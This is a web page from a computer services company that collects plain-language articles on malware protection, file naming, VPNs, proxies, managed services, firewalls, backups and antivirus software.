Category PSA Articles

Security Update – 2019

by Billy J Long Guidance, PSA Articles

Article (PSA‑0011)

Why This Year Was a Wake‑Up Call

From the rapid spread of WannaCry and NotPetya ransomware to the explosion of illicit cryptocurrency miners, 2017 reminded us that cyber‑threats can appear from unexpected places. Each year the quantity and variety of threats increase, and attackers continuously develop new ways to infiltrate devices while covering their tracks.

Key Threat Statistics (2017‑2023 Trend Highlights)

  • Ransomware – Over 2 billion records exposed worldwide (2022 Verizon DBIR).
  • Cryptocurrency miners – Symantec reported an 8,500 % increase in miner detections from 2016 to 2017; the trend continues with modern “cryptojacking” scripts on compromised websites.
  • Downloader families – + 92 % new variants reported in 2017; these “dropper” programs fetch additional malware after initial infection.
  • Mac malware – + 80 % new threats in 2017, and the numbers have kept climbing as macOS market share grows.

What Is Malware?

“Malware” = malicious software. It’s an umbrella term for any program that infects a computer without the user’s consent, including viruses, ransomware, spyware, ad‑ware, trojans, and cryptominers.

Common Infection Vectors (non‑exhaustive)

  • Infected email attachments.
  • Compromised USB thumb drives or external disks.
  • Downloads from untrusted websites or pirated software.
  • Malicious links in email, social‑media posts, instant‑message chats.
  • Drive‑by downloads via compromised legitimate‑looking websites (malvertising).

For a full glossary of terms, see our Threat Glossary.

Do You Need to Worry About Malware?

Absolutely. Cyber‑crime targets anyone with an Internet‑connected device—home users, small businesses, and large enterprises alike.

  • Business impact: A breach can expose customer data, trigger legal penalties (GDPR, HIPAA, PCI‑DSS), and damage reputation.
  • Personal impact: Family photos, financial documents, and personal communications can be stolen, encrypted, or deleted.
  • Recent surveys (Verizon 2023) show **≈ 1 in 3 people** reported a personal security incident in the past year.

Basic Protection Checklist (Start Here)

  1. Keep software updated. Enable automatic Windows/macOS updates, and patch third‑party apps as soon as patches appear.
  2. Use reputable antivirus/anti‑malware. Microsoft Defender (Windows 10/11) or a trusted third‑party solution (Bitdefender, Malwarebytes, ESET).
  3. Enable a firewall. Built‑in OS firewall is sufficient for most home users; ensure it’s turned on.
  4. Practice safe browsing. Don’t click unknown links, verify URLs, and avoid downloading from untrusted sites.
  5. Secure email. Use spam filters, enable MFA on email accounts, and never open unexpected attachments.
  6. Back up your data. Follow the 3‑2‑1‑0 rule (three copies, two media types, one off‑site, zero errors).
  7. Enable multi‑factor authentication (MFA) on any cloud service, VPN, and privileged accounts.

What to Do If You Suspect an Infection

  • Disconnect the device from the Internet (disable Wi‑Fi/Ethernet).
  • Run a full scan with an up‑to‑date anti‑malware product.
  • If the scan reports ransomware or a serious threat, isolate the machine and consider professional remediation.
  • Change passwords for any accounts accessed from the infected device (preferably from a clean device).
  • Restore files from a recent, verified backup if they have been encrypted or corrupted.

2025 Update – New Threat Landscape & Mitigations

Since the original 2017‑2023 overview, several important developments have reshaped the threat environment. Below is a concise addendum you can use to keep the article current.

1️⃣ Ransomware‑as‑a‑Service (RaaS) is Mainstream

  • Attack‑as‑a‑service platforms (e.g., LockBit 2.0, Hive, Blackcat) let low‑skill actors launch ransomware attacks for a subscription fee.
  • 2024 Verizon DBIR reported 61 % of data‑breach incidents involved ransomware, and total ransomware payments in 2024 topped **$1.5 billion**.
  • Mitigation: Deploy **endpoint detection & response (EDR)** solutions (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) that can detect malicious behavior before encryption begins; maintain immutable backups (write‑once, read‑many) to thwart ransom demands.

2️⃣ AI‑Generated Phishing & Deepfake Social Engineering

  • Large‑language models are being used to craft hyper‑personalized phishing emails that bypass traditional keyword filters.
  • Deepfake video/audio calls are increasingly used to impersonate executives (“CEO fraud”).
  • Mitigation: Adopt **zero‑trust email verification** (DMARC, SPF, DKIM), train staff with regular simulated phishing campaigns, and enforce MFA for all privileged accounts.

3️⃣ Supply‑Chain & Software‑Update Attacks

  • After the 2020 SolarWinds breach, attackers have focused on compromising software update mechanisms (e.g., recent Octave and EventX incidents in 2025).
  • Mitigation: Verify code signatures, enable **code‑signing integrity checks**, and limit admin rights on update tools.

4️⃣ Cryptojacking Evolution

  • Browser‑based cryptojacking scripts now target **WebAssembly** for higher hash rates, often delivered via compromised ad‑networks.
  • Mobile devices are also being hijacked to mine Monero via malicious apps.
  • Mitigation: Use browser extensions that block crypto‑mining scripts (e.g., uBlock Origin, NoScript), keep browsers and plug‑ins up to date, and run mobile anti‑malware scans.

5️⃣ Rise of “File‑less” Malware & Living‑off‑the‑Land (LotL) Techniques

  • Attackers increasingly leverage legitimate OS utilities (PowerShell, Windows Management Instrumentation, Office macros) to execute payloads without dropping a file on disk.
  • Mitigation: Enable **Windows Defender Exploit Guard** (Attack Surface Reduction rules), enforce **Application Control** (AppLocker or Microsoft Defender Application Control), and limit PowerShell execution policies.

6️⃣ Enhanced Defensive Technologies (2025)

  • Microsoft 365 Defender XDR integrates email, endpoint, identity, and cloud app protection using AI‑driven analytics.
  • Zero‑Trust Network Access (ZTNA) replaces traditional VPNs for many businesses, reducing lateral movement risk.
  • Endpoint platforms now provide **automated ransomware rollback** (e.g., CrowdStrike’s “Rollback” and SentinelOne’s “ActiveEDR”) that can restore files to pre‑infection state without a backup.

7️⃣ Updated Statistics (2025)

  • IDC estimates **5.6 billion** devices will be infected with some form of malware by the end of 2025.
  • 2024 Palo Alto Networks report shows a **28 % increase** in credential‑theft attacks targeting remote‑work setups.
  • Cyber‑insurance premiums have risen an average of **23 %** year‑over‑year, reflecting the growing cost of ransomware and data‑breach remediation.

Need Help Right Now?

If you have questions about current threats, want a security assessment, or need assistance cleaning an infected system, call PSA Computer Services at (707) 506‑6802. We’ll help you protect your data and get you back online safely.

Directory Structure and File Name Conventions

by Billy J Long Guidance, PSA Articles

Article (PSA‑0010)

Why Organised Folders & File Names Matter

Clear, consistent folder hierarchies and descriptive file names make it easy for anyone – you, a colleague, or a future replacement – to locate, sort, and understand data without having to open every file. When the structure is well‑planned you also reduce the risk of accidental overwrites, improve backup reliability, and simplify compliance audits.

General Principles

  • Consistency is king. Choose a convention and apply it everywhere.
  • Keep it human‑readable. A person should understand the purpose of a folder or file just by glancing at its name.
  • Stay within OS limits. Most file systems allow 255 characters per name and 260 characters for a full path (Windows) or 4 KB per path (Linux/macOS). Avoid nesting too deeply.
  • Separate concerns. Use top‑level directories for major categories (e.g., Personal, Business, Projects, Archives).

Designing a Folder Hierarchy

1️⃣ Top‑Level Categories

Start with a few broad folders that reflect the primary purpose of the data.

/Personal
/Business
/Shared
/Archives

2️⃣ Sub‑Categories by Type

Inside each top‑level folder, group by data type or function.

/Personal/
    Documents/
    Pictures/
    Music/
    Finance/
    Health/

 /Business/
    Clients/
    Projects/
    Marketing/
    HR/
    Finance/

3️⃣ Time‑Based Segmentation (when relevant)

For large, chronological collections (photos, invoices, logs) add a date hierarchy. Use the ISO‑8601 format YYYY‑MM (or YYYY‑MM‑DD) – it sorts naturally.

/Personal/Pictures/2024/01_Jan/
/Business/Finance/Invoices/2024/01_Jan/

4️⃣ Project‑Oriented Segmentation

When a project spans multiple data types, create a dedicated project folder and nest type‑specific subfolders inside it.

/Business/Projects/ABC_Redesign/
    Docs/
    Designs/
    Deliverables/
    Archive/

File‑Naming Conventions – Actionable Rules

  1. Date format – Use YYYYMMDD (or YYYY‑MM‑DD) at the beginning or end of the name. This format sorts correctly and avoids ambiguity across regions.
  2. Scope identifiers – Add short, standard abbreviations for:
    • Project code – e.g., ABC for Project ABC.
    • Department or client initials – e.g., HR, ACME.
  3. Versioning – Use zero‑padded numbers (v001, v002) so that lexical sorting matches chronological order.
  4. Descriptive title – Include a concise subject (max 3‑4 words) that remains meaningful outside the folder context.
  5. Separator choice – Use either _ (underscore) or - (hyphen) consistently. CamelCase is acceptable but avoid mixing styles.
  6. File‑type extension – Keep the correct extension (e.g., .pdf, .xlsx) as the last element.

Example File Names

20240415_ABC_Proposal_v001.pdf
20240328_HR_EmployeeList_v03.xlsx
IMG_20240112_Jan_Holiday.jpg
2024-04-30_Invoice_ACME_001.pdf

Do’s & Don’ts (quick reference)

  • Do use only alphanumeric characters, underscores (_), hyphens (-), and periods for the extension.
  • Do keep names concise – aim for ≤ 30 characters (excluding extension) when possible.
  • Do make the name readable without relying on the folder path for context.
  • Don’t use spaces, tabs, commas, semicolons, or special symbols (e.g., # $ % & *).
  • Don’t use all caps for the entire name; reserve caps for abbreviations only.
  • Don’t embed version control software identifiers (like .git) in regular file names unless the file is truly part of a repo.

Practical Tips for Implementation

  1. Document the standard. Create a one‑page cheat sheet and store it in the root folder (e.g., README_FileNaming.txt).
  2. Automate where possible. Use bulk‑rename tools (PowerRename in PowerToys, Bulk Rename Utility, or scripts) to retrofit existing files to the new convention.
  3. Leverage OS features. Use “Quick Access” (Windows) or “Favorites” (macOS) to pin frequently used top‑level folders.
  4. Regularly audit. Conduct a quarterly review to ensure new files follow the rules and to prune empty or obsolete folders.
  5. Back up consistently. A predictable folder structure improves backup reliability and makes restores faster.

When Working in a Team or Organization

  • Adopt the same hierarchy across all shared drives or cloud storage (OneDrive, Google Drive, SharePoint).
  • Agree on a master list of abbreviations (project codes, department IDs) to avoid collisions.
  • Include the naming policy in onboarding material and enforce it through periodic spot‑checks.

Bottom Line

A well‑designed folder tree combined with a clear, consistent file‑naming scheme turns a chaotic data dump into an organized, searchable library. Adopt the rules above, document them, and enforce them – the time you invest now saves countless hours later.

Need Assistance?

If you’d like help designing a folder hierarchy, creating a naming standard for your team, or cleaning up an existing file system, call PSA Computer Services at (707) 506‑6802.

Introduction to Virtual Private Network (VPN)

by Billy J Long Guidance, PSA Articles

Article (PSA‑0009) – Introduction to Virtual Private Networks (VPN)

A Virtual Private Network (VPN) creates an encrypted “tunnel” that carries your Internet traffic through a public network (the Internet) to a private network – typically your workplace, home network, or a commercial VPN server. All data that travels through the tunnel is cryptographically protected, so anyone who intercepts the traffic sees only gibberish.

What Can You Do With a VPN?

  • Network security & privacy – Public Wi‑Fi (coffee shops, airports, hotels) is a hot spot for “sniffing” attacks. A VPN encrypts every packet, preventing eavesdroppers from seeing which sites you visit or what credentials you type.
  • Remote access to work or home resources – Once connected, you appear to be on the same LAN as the VPN server. You can reach file shares, internal web apps, printers, databases, and other services that are otherwise blocked from the public Internet.
  • Access geo‑restricted content – By selecting a server in another country you can make websites think you are physically located there, letting you watch streaming services, use region‑locked tools, or test websites from multiple locales.
  • Bypass censorship – In countries where governments block social media, news sites, or messaging apps, a VPN routes traffic through a server outside the jurisdiction, restoring open Internet access.

How a VPN Works

A VPN consists of two main components:

  1. VPN client – Software you install on a device (Windows, macOS, Android, iOS, Linux, routers, etc.). The client authenticates to the VPN server and negotiates an encrypted tunnel.
  2. VPN server – The endpoint that receives your traffic, decrypts it, and forwards it to the destination network (or out to the public Internet). The server also enforces authentication (username/password, certificates, MFA) and may apply additional policies such as split‑tunneling or DNS filtering.

All traffic inside the tunnel is encrypted with modern ciphers (AES‑256‑GCM is the current standard). When the tunnel is up, the client routes either all traffic (full‑tunnel) or only selected traffic (split‑tunnel) through the VPN.

Common VPN Protocols (2025)

  • WireGuard – Fast, simple codebase, strong modern cryptography. Typical use: modern commercial VPNs and self‑hosted solutions.
  • OpenVPN (UDP/TCP) – Widely supported, mature, highly configurable. Typical use: enterprise remote‑access and cross‑platform compatibility.
  • IKEv2/IPsec – Excellent for mobile devices (auto‑reconnect), strong security. Typical use: corporate mobile‑device VPNs.

Should You Use a VPN?

Even if you never need to reach a private network, a VPN adds a useful layer of protection whenever you use public or untrusted Internet connections.

Benefits

  • Encrypts traffic, defending against passive eavesdropping and active “man‑in‑the‑middle” (MitM) attacks.
  • Hides your real IP address, making it harder for trackers or malicious sites to profile you.
  • Allows secure remote work without exposing internal services directly to the Internet.

Potential Downsides (and how to mitigate them)

  • Performance impact – Encryption adds overhead. Choose a fast protocol (WireGuard), a nearby server, and a reputable provider with sufficient bandwidth.
  • Trust in the VPN provider – The provider can see your traffic. Opt for a no‑logs policy, audited by a third party, or run your own self‑hosted VPN (e.g., a Raspberry Pi running WireGuard).
  • Split‑tunneling vs. full‑tunnel – Split‑tunneling improves speed but may leak DNS or other traffic. Enable DNS‑leak protection and a “kill switch” that blocks traffic if the VPN disconnects.

Best‑Practice Checklist

  1. Select a trustworthy VPN (no‑logs, reputable jurisdiction, independent audit).
  2. Use modern protocols – WireGuard or OpenVPN with AES‑256‑GCM.
  3. Enable a kill switch to prevent accidental exposure if the tunnel drops.
  4. Configure DNS‑leak protection – ensure all DNS queries travel through the VPN.
  5. Prefer full‑tunnel for public Wi‑Fi unless you have a specific reason for split‑tunnel.
  6. Combine with MFA for the VPN authentication step.
  7. Keep client software up to date – VPN apps receive security patches just like any other software.

When to Consider a Self‑Hosted VPN

If you need full control over the server, have compliance requirements, or simply want to avoid any third‑party logging, you can install a VPN on your own hardware:

  • Raspberry Pi or small Linux box running WireGuard or OpenVPN.
  • Edge/router‑based VPN (many ASUS, Netgear, and Ubiquiti routers include built‑in VPN servers).
  • Cloud VM (e.g., AWS Lightsail, DigitalOcean) with a VPN installed for remote‑access to cloud resources.

Bottom Line

For everyday users, a reputable commercial VPN provides a quick, user‑friendly way to protect privacy, secure public‑network use, and reach remote resources. For businesses, pairing a corporate VPN with a zero‑trust architecture (MFA, least‑privilege network policies, and conditional access) offers the strongest protection.

Disclaimer

This article is for **informational purposes only**. PSA Computer Services does **not** provide VPN services, nor do we sell, install, or manage VPN solutions. For assistance selecting a VPN provider or setting up a self‑hosted tunnel, please consult a qualified network or security specialist.

“There is wisdom in a multitude of counselors.”

Introduction to Proxy Servers

by Billy J Long Guidance, PSA Articles

Article (PSA‑0008) – Introduction to Proxy Servers

Every device that talks to the Internet must have an address that other computers can use to reply. That address is your **public IP address** – the number your ISP (Internet Service Provider) assigns to the modem/router that connects you to the outside world.

Where Does the Public IP Come From?

  • The ISP (e.g., AT&T, Suddenlink, Frontier, local fiber providers) hands out a dynamic or static IP address when you sign up for service.
  • Most residential connections use **dynamic IPs** that can change when the modem restarts; business lines often use **static IPs** for easier remote access.
  • Your public IP reveals roughly *where* the request originated (city‑level location) and is linked to the account you purchased from the ISP.

What Is a Proxy Server?

The word *proxy* means “substitute.” In networking, a **proxy server** acts as an intermediary between your computer (the client) and the destination server on the Internet. The client sends its request to the proxy; the proxy forwards the request, receives the response, and then passes that response back to the client.

Common Types (brief overview)

  • Forward proxy – Used by end‑users (you) to reach any public website. This is what most “web proxy” services provide.
  • Reverse proxy – Placed in front of a web‑server farm to distribute traffic, perform caching, or add security (e.g., Cloudflare, Nginx).
  • Transparent proxy – Intercepts traffic without requiring manual configuration; often used in corporate or school networks.
  • SOCKS5 proxy – Works at a lower network layer, forwarding any TCP/UDP traffic (useful for torrenting, SSH, or non‑HTTP apps).

How a Forward Proxy Works – Simple Flow

  1. Your browser (or another app) is configured to use a proxy (IP + port).
  2. You request https://psa-2.com in the address bar.
  3. The request is sent to the proxy server instead of directly to the Internet.
  4. The proxy opens a connection to psa-2.com and forwards your request.
  5. The web server sends the page back to the proxy.
  6. The proxy relays the page to your browser. To the web server, the request appears to come from the proxy’s IP, not yours.

Benefits of Using a Proxy

  • IP masking – The destination sees the proxy’s address, helping protect your personal IP.
  • Content filtering – Organizations can block known malicious sites or categories (e.g., gambling, social media).
  • Cache & bandwidth saving – Frequently accessed resources can be stored locally, reducing external traffic.
  • Access control – Requiring authentication before allowing outbound web traffic.
  • Basic anonymity – Combined with header or user‑agent changes, a proxy can make it harder for trackers to uniquely fingerprint a browser.

Potential Risks (Fair Warning)

  • Untrusted or free proxies may log every URL you visit, inject ads, or even serve malware.
  • Man‑in‑the‑middle (MitM) threats – If a proxy does not use HTTPS tunneling (the CONNECT method), it can alter the content you receive.
  • Loss of TLS protection – When a proxy terminates HTTPS, the connection between you and the proxy is encrypted, but the proxy‑to‑site link may be unencrypted unless the proxy forwards a proper TLS tunnel.
  • Performance impact – Extra hop can add latency, especially with overloaded or distant proxy servers.
  • Legal & policy concerns – Some services block known proxy IP ranges; using a proxy to evade geo‑restrictions can violate terms of service.

Best‑Practice Checklist for Safe Proxy Use

  1. Choose a reputable provider. Look for a clear privacy policy, no‑log claims, and TLS/HTTPS support.
  2. Prefer HTTPS‑aware proxies. Modern web proxies support the CONNECT method, preserving end‑to‑end encryption.
  3. Enable “SSL/TLS verification.” The proxy should validate the remote certificate to prevent spoofed sites.
  4. Combine with a VPN for stronger privacy. A VPN encrypts all traffic before it reaches the proxy, so the proxy cannot see the original source IP.
  5. Use authentication. Corporate proxies often require a username/password or single‑sign‑on (SSO) – this limits abuse.
  6. Regularly review proxy logs (if you administer one). Look for unusual destinations or volume spikes that could indicate abuse.
  7. Know when a proxy is unnecessary. For simple web browsing, a well‑configured VPN often provides better privacy with less risk.

Conclusion

Proxy servers can be useful tools for privacy, content control, and bandwidth optimization, but they must be chosen and configured carefully. An untrusted, free proxy can become a privacy nightmare, while a well‑run corporate proxy (or a reliable commercial service) adds a valuable layer of protection. For most home users who simply want encrypted, private browsing, a reputable VPN is often the safer and easier choice.

Disclaimer

This article is for **informational purposes only**. PSA Computer Services does **not** offer proxy services, nor do we sell, install, or manage proxy solutions. For guidance on selecting a trustworthy proxy provider or configuring a proxy, please consult a qualified network or security specialist.

What Are Managed Services

by Billy J Long Guidance, PSA Articles

Article (PSA‑0007) – What Are Managed Services? (Updated 2025)

A **Managed Services Provider (MSP)** is a trusted IT partner that assumes ongoing responsibility for monitoring, maintaining, and supporting a defined set of technology assets on behalf of a business. The MSP handles routine tasks (patching, backups, alerts) and escalates or resolves issues so you can focus on core business activities.

Key Characteristics (2025)

  • Proactive monitoring – Cloud‑based Remote Monitoring & Management (RMM) platforms to spot problems before they cause downtime.
  • Security‑first mindset – Managed firewalls, endpoint detection & response (EDR), phishing simulations.
  • Scalable service tiers – From basic monitoring to fully‑managed environments that include help‑desk, device provisioning, disaster‑recovery testing, and strategic IT planning.

Typical Managed Services Offering

  • Monitoring & Alerting – 24/7 device health checks, performance dashboards, and automated ticket creation.
  • Patch & Update Management – OS, firmware, and third‑party application updates with rollback capability.
  • Backup & Disaster Recovery – Automated 3‑2‑1 backups, nightly snapshots, and regular restore testing.
  • Security Services – Firewall management, EDR, vulnerability scanning, MFA rollout, and security awareness training.
  • Help‑Desk & End‑User Support – Remote troubleshooting, on‑site visits when needed, ticket tracking, and SLA‑driven response times.

Why Small Businesses Need Managed Services

Even a modest office relies on a complex mix of devices, software, and internet services. When those pieces break, productivity—and revenue—suffer.

  • Predictable costs – A monthly subscription replaces surprise emergency‑repair bills.
  • Reduced downtime – Proactive monitoring and rapid incident response keep email, CRM, accounting, and point‑of‑sale systems online.
  • Security compliance – MSPs keep patches up‑to‑date.
  • Focus on core business – You don’t need an in‑house “IT jack‑of‑all‑trades”; the MSP handles the day‑to‑day tech grind.
  • Scalable expertise – As you add users, or devices, the MSP grows with you without a hiring surge.

Pricing Models (2025 Landscape)

  • Per‑device / per‑user subscription – Most common; you pay a flat fee for each workstation, server, or user license.
  • Tiered service packages – Basic, Standard, Premium* tiers determine response time, on‑site coverage, and breadth of services.
  • Value‑based pricing – Some MSPs tie fees to measurable outcomes (e.g., downtime reduced < 5 % or compliance level achieved).
  • Project‑based add‑ons – Network redesign, or security assessments billed separately.

What to Look For When Choosing an MSP

  1. Service Level Agreement (SLA) – Clearly defined response and resolution times (e.g., 1‑hour critical response).
  2. Certifications & expertise – Microsoft Certified Partner, CompTIA Security+, Cisco CCNA, or vendor‑specific cloud certifications.
  3. Transparent RMM & ticketing – Access to a portal where you can view real‑time alerts, open tickets, and historical reports.
  4. Backup & DR testing – Verify that backups are encrypted, stored off‑site, and that restore tests are performed quarterly.
  5. On‑site support options – Even with remote tools, occasional hands‑on work may be needed; ensure reasonable travel‑fee structures.

Ready to Get Started?

Whether you need basic monitoring or a fully managed IT environment, PSA Computer Services can tailor a solution that fits your budget and growth plans.

Call us today at (707) 506‑6802 to discuss your needs, receive a customized quote, and schedule a free initial IT health assessment.

What Is A Firewall?

by Billy J Long Guidance, PSA Articles

Article (PSA‑0006)

A firewall is a security barrier that separates a **trusted** network (your home or business LAN) from an **untrusted** network (the Internet). The term comes from fire‑prevention: just as a special type of wall can slow/stop a fire from spreading, a firewall can stop unwanted traffic from reaching your local devices.

Types of firewalls

  • Software firewall – Runs on an operating system (Windows Defender Firewall, macOS Application Firewall, Linux iptables/nftables, third‑party tools).
  • Hardware firewall – A dedicated appliance or a router with built‑in firewall capabilities.
  • Cloud‑based firewall (FWaaS) – Managed firewalls delivered as a service (e.g., Azure Firewall, AWS Network Firewall, Cloudflare Zero Trust Gateway).
  • Next‑Generation Firewall (NGFW) – Combines traditional packet filtering with deep‑packet inspection, intrusion‑prevention, application control, and often integrated sandboxing.

How Does a Firewall Work?

Firewalls enforce a set of security rules that decide whether to allow or block traffic. They inspect traffic at different layers of the OSI model, using one or more of the following methods.

Core filtering methods

  1. Packet‑filtering (Layer 3/4) – Examines source/destination IP addresses, ports, and protocol type. Simple, fast, but limited to “allow/deny” rules.
  2. Stateful inspection (Layer 4) – Tracks each connection’s state (SYN, SYN‑ACK, ESTABLISHED, FIN). Only packets that belong to a legitimate, established session are permitted, which reduces spoofing.
  3. Proxy / Application‑level gateway (Layer 7) – Acts as an intermediary for specific protocols (HTTP, SMTP, FTP). It can inspect the actual payload, enforce URL filtering, and hide internal IP addresses.
  4. Deep‑packet inspection (DPI) & sandboxing (NGFW) – Analyzes the full content of packets, detects malware, blocks suspicious scripts, and enforces application‑specific policies (e.g., “block Facebook app traffic”).

Do You Need a Firewall?

Absolutely. If a device can reach the Internet, it should be protected by an up‑to‑date firewall.

  • Windows 10/11, macOS, and most Linux distributions include a built‑in host‑based firewall that is enabled by default.
  • Home routers / ISP‑provided gateways usually have a basic hardware firewall (NAT + simple packet filter). You can tighten those rules via the router’s web UI.
  • Small‑business networks benefit from a dedicated firewall appliance or a cloud‑based firewall that offers:
    • Intrusion Prevention System (IPS)
    • Application‑aware filtering
    • VPN termination (site‑to‑site and client‑to‑site)
    • Centralized logging & reporting

Quick self‑check

  1. Is the host‑based firewall turned on? (Windows → “Windows Defender Firewall”; macOS → “Firewall” in Security & Privacy.)
  2. Does your router have the default “block inbound unsolicited traffic” rule enabled?
  3. Are any ports deliberately opened to the Internet (e.g., remote‑desktop, web server)? If so, confirm they are necessary and secured (use VPN, strong passwords, MFA).
  4. Do you have a separate hardware or cloud firewall for your business network? If not, consider adding one as you scale.

Best‑Practice Checklist for Firewall Management (2025)

  • Keep firmware and definitions up to date. Automatic updates are essential to protect against newly discovered exploits.
  • Apply the principle of least privilege. Only allow traffic that is explicitly required; block everything else by default.
  • Use separate zones. Separate Wi‑Fi guests, IoT devices, and corporate workstations into different VLANs/sub‑nets with inter‑zone firewall rules.
  • Enable logging and alerts. Forward logs to a SIEM or a cloud log service to spot abnormal patterns early.
  • Deploy a VPN or Zero‑Trust Network Access (ZTNA) solution. Remote users should never connect directly to the LAN; tunnel through a secure gateway.
  • Regularly review rules. Conduct a quarterly rule‑audit; remove stale or overly permissive entries.
  • Test your configuration. Use tools such as Nmap or external port‑scan services to verify that only intended ports are open.
  • Consider a Next‑Generation Firewall. For businesses, NGFWs provide integrated IPS, URL filtering, and application control, reducing the need for multiple separate security products.

Emerging Trends (2025 Addendum)

  • AI‑assisted threat detection – Modern NGFWs use machine learning to spot anomalous traffic patterns and automatically quarantine suspicious sessions.
  • Zero‑Trust Network Access (ZTNA) – Replaces traditional perimeter firewalls with identity‑centric policies; each request is verified before access is granted.
  • Secure Access Service Edge (SASE) – Converges firewall, secure web gateway, and cloud‑based security into a single, globally distributed service.
  • Immutable, cloud‑native firewalls – Provide auto‑scaling, instant provisioning for hybrid‑cloud environments (Azure Firewall Premium, Google Cloud Armor).

Need a Firewall Review or Upgrade?

If you’re unsure whether your current firewall is configured correctly, or simply need a quick health‑check, give PSA Computer Services a call at (707) 506‑6802. We’ll assess your environment, and ensure you have a modern, reliable protective barrier.

High availability – following the backup rule

by Billy J Long Guidance, PSA Articles

Article (PSA‑0005)

What “High Availability” (HA) Really Means

High Availability is a design goal that ensures a system delivers an agreed level of uptime –‑ usually 99.9 % (≈ 8 h downtime/yr) or higher –‑ even when components fail. Modern businesses (hospitals, data‑centers, SaaS providers, remote offices) depend on HA to keep critical applications running 24/7.

Key HA concepts (2025)

  • Redundancy – Duplicate hardware or virtual instances (servers, storage, network paths) so a single failure never stops service.
  • Failover & Automatic Switchover – Monitoring detects a failure and instantly routes traffic to a standby component (e.g., active‑passive cluster, hot‑standby VM).
  • Load Balancing – Distributes traffic across multiple nodes, improving performance and providing another layer of fault tolerance.
  • Geographic Distribution – Deploying services across multiple data‑center locations or cloud regions reduces the impact of site‑wide outages.
  • Replication & Data Synchronisation – Keeps data copies in near‑real‑time (block‑level or file‑level) on separate nodes.
  • RPO & RTORecovery Point Objective (how much data loss is tolerable) and Recovery Time Objective (how quickly service must be restored). HA architectures are built to meet the RPO/RTO goals you define.

Where Backups Fit In

Backups are the foundation of any HA strategy, but they’re just one piece of the puzzle. A solid backup plan protects you from data loss caused by hardware failure, ransomware, accidental deletion, or catastrophic events.

The classic 3‑2‑1‑0 rule (still the gold standard)

  1. 3 – Three copies – Primary data + two additional backups.
  2. 2 – Two media types – For example, an internal NAS (or disk) plus cloud object storage (e.g., Backblaze B2, Azure Blob, Amazon S3).
  3. 1 – One off‑site location – Store at least one copy in a different physical site or a cloud region.
  4. 0 – Zero‑error verification – Test restores regularly (at least quarterly) to confirm backups are usable.

2025‑enhanced backup practices

  • Immutable storage – Write‑once, read‑many (WORM) or object‑storage lock features that prevent even administrators from overwriting recent backups. This thwarts ransomware that tries to encrypt backups.
  • Snapshot‑based protection – Use volume snapshots (VSS on Windows, LVM snapshots on Linux, or ZFS) for near‑instant point‑in‑time copies.
  • Hybrid cloud backup – Combine on‑premise fast restores with cloud durability; many solutions now offer built‑in encryption, compression, and bandwidth throttling.
  • Automated backup testing – Scripts that periodically restore a random file or database row and verify checksum integrity.
  • Ransomware‑aware backup policies – Separate “live” backup streams from “archival” immutable copies; rotate the live backups daily, weekly, monthly.

Putting It All Together: A Simple HA Blueprint

  1. Assess critical services. Identify which applications, databases, and file shares must stay online.
  2. Define RPO/RTO targets. Example: RPO = 15 minutes for ERP database; RTO = 30 minutes for web portal.
  3. Build redundancy. Deploy two servers (or VMs) in an active‑active cluster behind a load balancer; add a second network path (dual ISP or VLAN).
  4. Implement replication. Use real‑time mirroring (e.g., Storage‑Space‑Direct, DRBD, or cloud‑native database replication) to keep data in sync across nodes.
  5. Apply the 3‑2‑1‑0 backup rule. Schedule daily incremental backups + weekly full backups, store one copy locally, one copy in a second media type, and one copy in a secure cloud region.
  6. Test failover and restore. Quarterly, simulate a server loss and verify that traffic switches automatically, then run a backup‑restore drill to validate data integrity.
  7. Monitor and alert. Use an RMM or SIEM to watch health metrics, backup job success, and latency; set up alerts for any breach of RPO/RTO.

Common Pitfalls to Avoid

  • Treating backups as a “set‑and‑forget” task – without regular testing, backups can be corrupted or incomplete.
  • Relying on a single backup media type (e.g., only external hard drives) – hardware failures are inevitable.
  • Storing all copies in the same physical location – a fire or flood can wipe everything.
  • Neglecting encryption and access controls – unprotected backups are a gold mine for attackers.
  • Ignoring the human factor – document procedures, train staff, and enforce least‑privilege access to backup systems.

Bottom Line

High Availability is much more than “just a backup”. It blends redundancy, real‑time replication, automated failover, and rigorous testing to keep services running. The 3‑2‑1‑0 backup rule remains the foundation, but in 2025 you should augment it with immutable storage, cloud snapshots, and regular restore verification to meet modern RPO/RTO expectations.

Need a Custom HA & Backup Strategy?

PSA Computer Services can design, implement, and test a solution that meets your uptime goals and budget.

Call us today at (707) 506‑6802 for a free assessment.

How Antivirus & Antispyware Work

by Billy J Long Guidance, PSA Articles

Article (PSA‑0004)

If a computer is connected to the Internet it is exposed to a constant stream of files, links, and network traffic. An up‑to‑date **antivirus/antispyware** solution provides the first line of defense by:

  • Scanning files in real time as they are downloaded or executed.
  • Running scheduled deep scans of the entire drive or selected folders.
  • Leveraging constantly‑updated threat definitions and heuristic/AI‑based detection.

Key features you should look for (2025)

  • Real‑time protection – automatically blocks malicious code before it runs.
  • Scheduled full‑disk scans – weekly or bi‑weekly deep scans.
  • Cloud‑based AI/behavioral analysis – catches zero‑day threats that signatures haven’t seen yet.
  • Automatic definition updates – at least daily.
  • Low system impact – runs efficiently on modern hardware without excessive RAM or CPU usage.

Built‑In Windows Options (Free)

  • Windows 10/11 – Microsoft Defender (formerly Windows Defender). Integrated, automatically updated, and provides both antivirus and antispyware protection at no extra cost.
  • Windows 7 – Microsoft Security Essentials (no longer supported after Jan 2020). If you are still on Windows 7, upgrade to a supported OS or use a third‑party solution, because Microsoft no longer provides definition updates for Windows 7.

Third‑Party Solutions (When You Need More)

For businesses or users who want additional features (e.g., ransomware‑specific protection, web‑filtering, centralized management), consider reputable vendors such as:

  • Bitdefender GravityZone
  • Kaspersky Endpoint Security
  • SentinelOne
  • Maldetect + ClamAV (for Linux/UNIX environments)

Why One Antivirus Is Enough

Running more than one real‑time AV/antispyware engine on the same machine creates problems:

  1. Resource contention – Each engine consumes RAM and CPU; the system may start paging to disk, drastically slowing performance.
  2. Software conflicts – Two scanners can flag each other as malicious, leading to false positives, constant alerts, or even system instability.
  3. Self‑quarantine – One product may quarantine the other’s core files, corrupting the second product and making it difficult to repair.
  4. Licensing overhead – Multiple subscriptions increase cost and administrative effort.

In short, **one well‑chosen, continuously updated product plus a firewall** gives you comprehensive protection without the downsides.

How to Detect an Infection

  • Frequent pop‑ups, unexpected toolbars, or strange system notifications.
  • New icons, programs, or services appearing without your consent.
  • Home‑page changes, unwanted redirects, or DNS hijacking.
  • System slowdown, frequent freezes, or crashes during routine tasks.
  • Unusual outbound network traffic (check with a network monitor or firewall logs).

